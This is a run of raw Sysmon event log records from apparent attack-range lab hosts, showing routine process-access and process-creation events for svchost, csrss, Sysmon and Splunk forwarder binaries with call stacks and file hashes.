|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017210Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017209Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017208Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017207Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017206Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E500-63C7-1602-00000000B002}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017205Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.961{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E500-63C7-1602-00000000B002}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017204Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.962{E5A8D418-E500-63C7-1602-00000000B002}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000017203Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.463{E5A8D418-E500-63C7-1502-00000000B002}3763608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017202Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E500-63C7-1502-00000000B002}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017201Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017200Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017199Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017198Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017197Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017196Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017195Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017194Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017193Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017192Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E500-63C7-1502-00000000B002}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017191Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.291{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E500-63C7-1502-00000000B002}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017190Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.292{E5A8D418-E500-63C7-1502-00000000B002}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017189Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:32.235{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=775567B6DE9CA74B5327BF3BD3F55CFE,SHA256=7FE4524FF0F69288EB4FD164111469CC7394BFEDD229748FAA4C38A6EEE6829D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.579{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34E5D5D201A5536DADDA34694B08960B,SHA256=4C3AC070CF5036422B5D18608923553CE28092BD5507AF787F83C22FAD3B2126,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.529{FE4C2B44-E500-63C7-5E06-00000000AF02}71526640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.463{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.379{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E500-63C7-5E06-00000000AF02}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.379{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.379{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 